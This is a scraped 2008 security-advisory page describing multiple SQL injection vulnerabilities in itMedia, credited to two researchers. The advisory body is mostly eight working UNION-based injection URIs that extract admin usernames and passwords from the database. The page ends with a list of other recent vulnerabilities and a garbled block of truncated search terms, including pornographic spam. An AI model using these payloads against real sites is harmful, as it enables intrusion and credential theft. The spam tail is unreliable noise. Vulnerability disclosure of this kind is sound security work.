exploits , vulnerabilities , articles , itMedia Multiple SQL Injection Vulnerabilities

Title	itMedia Multiple SQL Injection Vulnerabilities
Published	2008-08-18-12:00AM
Updated	2008-08-27-10:54PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	baltazar and sinner_01
Vulnerable	itMedia itMedia 0
Not Vulnerable
Code	Attackers can use a browser to exploit these issues.The following example URIs are available: http://www.example.com/vijest.php?id=-1+union+all+select+1,concat_ws(char(58),user,pass),3,4,5,6,7+from+admin--http://www.example.com/vijesti.php?id=-1+union+all+select+1,2,concat_ws(char(58),user,pass)+from+admin--http://www.example.com/vijest.php?id=-1+union+all+select+1,2,concat_ws(char(58),user,pass),4,5,6,7,8,9,10+from+admin--http://www.example.com/galerija.php?op=slika&ids=-1+union+all+select+1,null,concat_ws(char(58),user,pass)+from+admin--http://www.example.com/galerija.php?op=slika&ids=-1+union+all+select+1,null,concat_ws(char(58),user,pass),4,5+from+admin--http://www.example.com/ponuda.php?op=slika&ids=-1+union+all+select+1,concat_ws(char(58),user,pass),3+from+admin--http://www.example.com/ponuda.php?op=kategorija&id=-1+union+all+select+1,2,concat_ws(char(58),user,pass),4+from+admin--http://www.example.com/slike.php?op=slika&ids=-1+union+all+select+1,2,concat_ws(char(58),user,pass),4,5+from+admin--
TXT

Vulnerabilities - newest 10 RSS | More

2008-11-22 KVIrc URI Handler Remote Command Execution Vulnerability
2008-11-22 NVIDIA Cg Toolkit Installer Insecure Temporary File Creation Vulnerability
2008-11-22 TkUsr Insecure Temporary File Creation Vulnerability
2008-11-21 TAU Tuning and Analysis Utilities Insecure Temporary File Creation Vulnerabilities
2008-11-21 Maildirsync Insecure Temporary File Creation Vulnerability
2008-11-21 TkMan Insecure Temporary File Creation Vulnerability
2008-11-21 Apple iPhone Configuration Web Utility for Windows Directory Traversal Vulnerability
2008-11-21 Cisco IOS and CatOS VLAN Trunking Protocol Packet Handling Denial Of Service Vulnerability
2008-11-21 vBulletin Visitor Messages Addon Comment Notification HTML Injection Vulnerability
2008-11-21 Apple Mac OS X CoreGraphics Multiple Memory Corruption Vulnerabilities

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Sun, 23 Nov 2008 08:50:22 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
ww . . CMS is Fre www.sex oc Www.phoner mambo Remo Akssexy video porn News Searc blackass.c WebSphere Akssexy Www pakist news for c Remote Fil cfm exploi QMOV.Com Www.sexygi Chudai 200 /compo BEN wali trishasex CMS is Fre www.Sex Wa Www.video. mambo Remo t339t video clip i want t WWW.Sexsex t339t CMS is Fre Sex pohtos mambo Remo Www.sexygi sexmalasia Exim smtpd xxnx.com port 220 videosvida Vidio porn trishasex CMS is Fre mijestiq CMS is Fre 200 /compo www.trisha news for c www.trisha Car Sex30